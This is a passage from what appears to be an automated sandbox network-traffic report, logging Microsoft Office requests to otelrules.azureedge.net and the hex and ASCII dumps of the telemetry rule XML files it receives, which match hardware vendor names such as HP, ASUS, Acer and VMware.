              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              16192.168.2.44977613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:14 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:14 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:14 GMT
              Content-Type: text/xml
              Content-Length: 632
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
              ETag: "0x8DC582BB6E3779E"
              x-ms-request-id: 999c3d90-401e-00a3-7f00-428b09000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234114Z-174f7845968qj8jrhC1EWRh41s00000010kg000000009am6
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:14 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


              Session IDSource IPSource PortDestination IPDestination Port
              17192.168.2.44977913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:16 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:17 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:16 GMT
              Content-Type: text/xml
              Content-Length: 407
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
              ETag: "0x8DC582BBAD04B7B"
              x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234116Z-174f7845968j6t2phC1EWRcfe800000010rg00000000e2yt
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:17 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


              Session IDSource IPSource PortDestination IPDestination Port
              18192.168.2.44978113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:16 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:17 UTC471INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:17 GMT
              Content-Type: text/xml
              Content-Length: 427
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
              ETag: "0x8DC582BA310DA18"
              x-ms-request-id: 25c4f972-a01e-0021-6cb8-42814c000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234117Z-174f78459684db9fhC1EWRc7g400000000m000000000a14h
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_MISS
              Accept-Ranges: bytes
              2024-11-29 23:41:17 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


              Session IDSource IPSource PortDestination IPDestination Port
              19192.168.2.44978013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:16 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:17 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:17 GMT
              Content-Type: text/xml
              Content-Length: 486
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
              ETag: "0x8DC582BB344914B"
              x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234117Z-174f78459684bddphC1EWRbht400000010a000000000fbqw
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:17 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              20192.168.2.44978213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:16 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:17 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:17 GMT
              Content-Type: text/xml
              Content-Length: 486
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
              ETag: "0x8DC582B9018290B"
              x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234117Z-174f7845968cpnpfhC1EWR3afc00000010c00000000006s8
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:17 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              21192.168.2.44978313.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:16 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:17 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:17 GMT
              Content-Type: text/xml
              Content-Length: 407
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
              ETag: "0x8DC582B9698189B"
              x-ms-request-id: 72388ca2-901e-0029-4711-41274a000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234117Z-174f7845968n2hr8hC1EWR9cag00000010bg000000002a82
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:17 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


              Session IDSource IPSource PortDestination IPDestination Port
              22192.168.2.44978413.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:18 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:19 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:19 GMT
              Content-Type: text/xml
              Content-Length: 469
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
              ETag: "0x8DC582BBA701121"
              x-ms-request-id: d85cda50-501e-000a-581c-410180000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234119Z-174f7845968cdxdrhC1EWRg0en00000010mg0000000079zn
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:19 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              23192.168.2.44978713.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:19 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:19 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:19 GMT
              Content-Type: text/xml
              Content-Length: 464
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
              ETag: "0x8DC582B97FB6C3C"
              x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234119Z-174f7845968frfdmhC1EWRxxbw00000010t00000000011by
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:19 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


              Session IDSource IPSource PortDestination IPDestination Port
              24192.168.2.44978513.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:19 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:19 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:19 GMT
              Content-Type: text/xml
              Content-Length: 415
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
              ETag: "0x8DC582BA41997E3"
              x-ms-request-id: 9a3d38b7-801e-00ac-4db3-42fd65000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234119Z-174f78459684db9fhC1EWRc7g400000000r0000000002t37
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


              Session IDSource IPSource PortDestination IPDestination Port
              25192.168.2.44978813.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:19 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:19 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:19 GMT
              Content-Type: text/xml
              Content-Length: 494
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
              ETag: "0x8DC582BB7010D66"
              x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234119Z-174f7845968qj8jrhC1EWRh41s00000010f000000000ms32
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:19 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              26192.168.2.44978613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:19 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:19 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:19 GMT
              Content-Type: text/xml
              Content-Length: 477
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
              ETag: "0x8DC582BB8CEAC16"
              x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234119Z-174f7845968cpnpfhC1EWR3afc00000010bg000000001c2x
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:19 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              27192.168.2.44978913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:21 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:21 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:21 GMT
              Content-Type: text/xml
              Content-Length: 419
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
              ETag: "0x8DC582B9748630E"
              x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234121Z-174f7845968cdxdrhC1EWRg0en00000010m0000000008dd2
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
